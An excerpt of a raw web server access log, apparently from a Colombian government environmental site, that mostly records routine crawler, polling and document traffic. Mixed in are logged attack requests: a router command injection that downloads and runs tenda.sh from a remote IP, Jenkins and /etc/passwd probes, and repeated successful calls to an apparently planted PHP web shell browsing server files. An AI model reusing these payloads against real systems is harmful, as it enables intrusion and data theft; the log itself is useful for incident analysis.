191.156.47.190 - - [04/Apr/2024:01:58:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 3064765
191.156.41.159 - - [04/Apr/2024:01:58:33 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 287001
191.156.35.114 - - [04/Apr/2024:01:58:32 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1316115
191.156.35.114 - - [04/Apr/2024:01:58:35 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 16051
191.156.47.190 - - [04/Apr/2024:01:58:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 3260010
201.245.192.253 - - [04/Apr/2024:01:58:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
191.156.47.190 - - [04/Apr/2024:01:58:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 588420
191.156.34.18 - - [04/Apr/2024:01:58:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 6325681
201.245.192.253 - - [04/Apr/2024:01:58:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
191.156.32.41 - - [04/Apr/2024:02:00:13 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
40.77.167.25 - - [04/Apr/2024:02:00:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4663.pdf HTTP/1.1" 200 484062
191.156.38.135 - - [04/Apr/2024:02:00:13 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 35072
191.156.32.41 - - [04/Apr/2024:02:00:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.32.41 - - [04/Apr/2024:02:00:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.32.41 - - [04/Apr/2024:02:00:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.32.41 - - [04/Apr/2024:02:00:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.32.41 - - [04/Apr/2024:02:00:16 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.38.135 - - [04/Apr/2024:02:00:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1404
216.245.221.92 - - [04/Apr/2024:02:00:19 -0500] "HEAD / HTTP/1.1" 200 -
191.156.38.135 - - [04/Apr/2024:02:00:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 142290
191.156.32.41 - - [04/Apr/2024:02:00:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.32.41 - - [04/Apr/2024:02:00:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.32.41 - - [04/Apr/2024:02:00:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.32.41 - - [04/Apr/2024:02:00:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [04/Apr/2024:02:00:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:00:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [04/Apr/2024:01:59:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Apr/2024:02:00:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [04/Apr/2024:02:02:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:02:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:02:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [04/Apr/2024:02:02:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [04/Apr/2024:02:04:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:04:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [04/Apr/2024:02:05:19 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Apr/2024:02:06:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
40.77.167.10 - - [04/Apr/2024:02:06:41 -0500] "GET /Publicaciones/2024EE58951.pdf HTTP/1.1" 404 227
201.245.192.253 - - [04/Apr/2024:02:06:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [04/Apr/2024:02:05:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Apr/2024:02:06:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [04/Apr/2024:02:07:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [04/Apr/2024:02:07:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
201.245.192.253 - - [04/Apr/2024:02:08:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:08:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [04/Apr/2024:02:10:12 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
172.22.2.4 - - [04/Apr/2024:02:10:12 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
52.167.144.222 - - [04/Apr/2024:02:10:12 -0500] "GET /portaldeninos/wp-content/uploads/2020/11/La-Vaca-B-768x432.jpg HTTP/1.1" 200 71377
216.245.221.92 - - [04/Apr/2024:02:10:19 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.235 - - [04/Apr/2024:02:10:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/1451.pdf HTTP/1.1" 304 -
201.245.192.253 - - [04/Apr/2024:02:10:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:10:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:12:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [04/Apr/2024:02:11:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Apr/2024:02:12:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:12:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
17.241.227.188 - - [04/Apr/2024:02:12:59 -0500] "GET /el-renacer-la-huerta-de-28-reclusos-de-la-carcel-la-picota.html HTTP/1.1" 200 744
52.167.144.235 - - [04/Apr/2024:02:13:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0594.pdf HTTP/1.1" 304 -
47.128.99.132 - - [04/Apr/2024:02:13:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CPORTAL_SIAC&f=.. HTTP/1.1" 200 2861
172.22.2.4 - - [04/Apr/2024:02:12:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53818
66.249.66.12 - - [04/Apr/2024:02:13:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 200 370932
201.245.192.253 - - [04/Apr/2024:02:14:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:14:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [04/Apr/2024:02:15:19 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Apr/2024:02:16:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:16:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
40.77.167.126 - - [04/Apr/2024:02:17:44 -0500] "GET /BLA/resoluciones/AUTOS%202020/2155.pdf HTTP/1.1" 304 -
201.245.192.253 - - [04/Apr/2024:02:17:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [04/Apr/2024:02:18:28 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%202%20del%205%20de%20Mayo%20de%202014.pdf HTTP/1.1" 304 -
172.22.2.4 - - [04/Apr/2024:02:18:31 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
201.245.192.253 - - [04/Apr/2024:02:18:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [04/Apr/2024:02:17:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Apr/2024:02:18:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:18:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38397
201.245.192.253 - - [04/Apr/2024:02:18:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41152
40.77.167.22 - - [04/Apr/2024:02:19:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1911.pdf HTTP/1.1" 404 1018
172.22.2.4 - - [04/Apr/2024:02:17:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
40.77.167.22 - - [04/Apr/2024:02:19:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1911.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [04/Apr/2024:02:19:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36983
216.245.221.92 - - [04/Apr/2024:02:20:19 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Apr/2024:02:20:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41152
201.245.192.253 - - [04/Apr/2024:02:20:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:20:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
40.77.167.22 - - [04/Apr/2024:02:21:50 -0500] "GET /Publicaciones/2024EE12229.pdf HTTP/1.1" 404 227
201.245.192.253 - - [04/Apr/2024:02:22:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:22:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [04/Apr/2024:02:22:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [04/Apr/2024:02:22:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
17.241.227.6 - - [04/Apr/2024:02:22:59 -0500] "GET /el-agua-recurso-vital-para-la-conservacion-de-los-ecosistemas.html HTTP/1.1" 200 870
52.167.144.224 - - [04/Apr/2024:02:23:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3527.pdf HTTP/1.1" 200 353840
137.220.197.141 - - [04/Apr/2024:02:23:40 -0500] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1" 404 1035
137.220.197.141 - - [04/Apr/2024:02:23:40 -0500] "GET / HTTP/1.1" 200 319
137.220.197.141 - - [04/Apr/2024:02:23:40 -0500] "OPTIONS / HTTP/1.1" 200 -
137.220.197.141 - - [04/Apr/2024:02:23:40 -0500] "GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1" 404 1035
137.220.197.141 - - [04/Apr/2024:02:23:40 -0500] "POST /jolokia/read/getDiagnosticOptions HTTP/1.1" 404 1035
137.220.197.141 - - [04/Apr/2024:02:23:40 -0500] "GET /command.cgi?cat%20/etc/passwd HTTP/1.1" 404 1035
137.220.197.141 - - [04/Apr/2024:02:23:40 -0500] "GET /__ HTTP/1.1" 404 1035
137.220.197.141 - - [04/Apr/2024:02:23:40 -0500] "POST /integration/saveGangster.action HTTP/1.1" 404 1035
47.128.98.204 - - [04/Apr/2024:02:23:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2173.pdf&ft=sdb HTTP/1.1" 200 3015
47.128.98.204 - - [04/Apr/2024:02:23:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.98.204 - - [04/Apr/2024:02:23:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.98.204 - - [04/Apr/2024:02:23:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.98.204 - - [04/Apr/2024:02:23:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.98.204 - - [04/Apr/2024:02:23:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.98.204 - - [04/Apr/2024:02:23:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.98.204 - - [04/Apr/2024:02:23:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.98.204 - - [04/Apr/2024:02:23:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.98.204 - - [04/Apr/2024:02:23:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.98.204 - - [04/Apr/2024:02:23:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.118.172 - - [04/Apr/2024:02:24:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2596.pdf&ft=code&white=1 HTTP/1.1" 200 375919
172.22.2.4 - - [04/Apr/2024:02:22:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Apr/2024:02:24:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:24:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
47.128.98.171 - - [04/Apr/2024:02:24:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150623-0433-986000.txt&ft=notepad HTTP/1.1" 200 2985
216.245.221.92 - - [04/Apr/2024:02:25:19 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Apr/2024:02:23:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
40.77.167.22 - - [04/Apr/2024:02:25:27 -0500] "GET /Publicaciones/2024EE47661.pdf HTTP/1.1" 404 227
178.62.246.155 - - [04/Apr/2024:02:25:59 -0500] "\x16\x03\x01" 400 226
178.62.246.155 - - [04/Apr/2024:02:26:00 -0500] "\x16\x03\x01" 400 226
178.62.246.155 - - [04/Apr/2024:02:26:00 -0500] "GET / HTTP/1.1" 200 319
178.62.246.155 - - [04/Apr/2024:02:26:00 -0500] "GET /form.html HTTP/1.1" 404 1018
178.62.246.155 - - [04/Apr/2024:02:26:01 -0500] "GET /upl.php HTTP/1.1" 404 1018
178.62.246.155 - - [04/Apr/2024:02:26:01 -0500] "\x16\x03\x01" 400 226
178.62.246.155 - - [04/Apr/2024:02:26:01 -0500] "GET /geoip/ HTTP/1.1" 404 1018
178.62.246.155 - - [04/Apr/2024:02:26:02 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
178.62.246.155 - - [04/Apr/2024:02:26:02 -0500] "GET /1.php HTTP/1.1" 404 1018
178.62.246.155 - - [04/Apr/2024:02:26:03 -0500] "GET /bundle.js HTTP/1.1" 404 1018
178.62.246.155 - - [04/Apr/2024:02:26:03 -0500] "GET /files/ HTTP/1.1" 404 1018
178.62.246.155 - - [04/Apr/2024:02:26:03 -0500] "GET /systembc/password.php HTTP/1.1" 404 1018
178.62.246.155 - - [04/Apr/2024:02:26:04 -0500] "GET /password.php HTTP/1.1" 404 1018
178.62.246.155 - - [04/Apr/2024:02:26:04 -0500] "GET /info.php HTTP/1.1" 404 1018
201.245.192.253 - - [04/Apr/2024:02:26:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:26:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:27:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [04/Apr/2024:02:28:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:28:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38397
201.245.192.253 - - [04/Apr/2024:02:28:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:28:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41152
40.77.167.54 - - [04/Apr/2024:02:29:12 -0500] "GET /iboca-presenta-intermitencia-seguimiento-de-calidad-del-aire-se-hace-por-medio-de-la-red-de-monitoreo.html HTTP/1.1" 200 1027
137.220.197.141 - - [04/Apr/2024:02:29:38 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [04/Apr/2024:02:29:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36983
172.22.2.4 - - [04/Apr/2024:02:29:41 -0500] "GET /BLA/boletinlegal/geoserver/web/ HTTP/1.1" 404 1018
52.167.144.224 - - [04/Apr/2024:02:30:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2995.pdf HTTP/1.1" 200 443773
216.245.221.92 - - [04/Apr/2024:02:30:19 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Apr/2024:02:28:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Apr/2024:02:30:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41152
201.245.192.253 - - [04/Apr/2024:02:30:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:30:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
17.241.75.159 - - [04/Apr/2024:02:31:03 -0500] "GET /distrito-celebro-el-cumpleanos-del-parque-ecologico-distrital-de-montana-entrenubes.html HTTP/1.1" 200 829
172.22.2.4 - - [04/Apr/2024:02:29:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
172.22.2.4 - - [04/Apr/2024:02:31:13 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1018
52.167.144.224 - - [04/Apr/2024:02:32:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2228.pdf HTTP/1.1" 200 398313
201.245.192.253 - - [04/Apr/2024:02:32:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:32:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [04/Apr/2024:02:32:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
47.128.119.180 - - [04/Apr/2024:02:33:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp&f=showcode.php HTTP/1.1" 200 2859
47.128.120.36 - - [04/Apr/2024:02:33:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Cmailoutput&f=mail-20150902-1620-4000.txt HTTP/1.1" 200 2861
52.167.144.209 - - [04/Apr/2024:02:33:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1538.pdf HTTP/1.1" 200 279986
47.128.120.67 - - [04/Apr/2024:02:33:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes&f=wlwmanifest.xml HTTP/1.1" 200 3019
47.128.120.67 - - [04/Apr/2024:02:33:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_xml HTTP/1.1" 200 231
47.128.120.67 - - [04/Apr/2024:02:33:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.120.67 - - [04/Apr/2024:02:33:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.120.67 - - [04/Apr/2024:02:33:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.120.67 - - [04/Apr/2024:02:33:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.120.67 - - [04/Apr/2024:02:33:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.120.67 - - [04/Apr/2024:02:33:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.120.67 - - [04/Apr/2024:02:33:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.120.67 - - [04/Apr/2024:02:33:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.120.67 - - [04/Apr/2024:02:33:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
172.22.2.4 - - [04/Apr/2024:02:34:06 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20sentencia%20C-1007-2011-1.doc HTTP/1.1" 200 35328
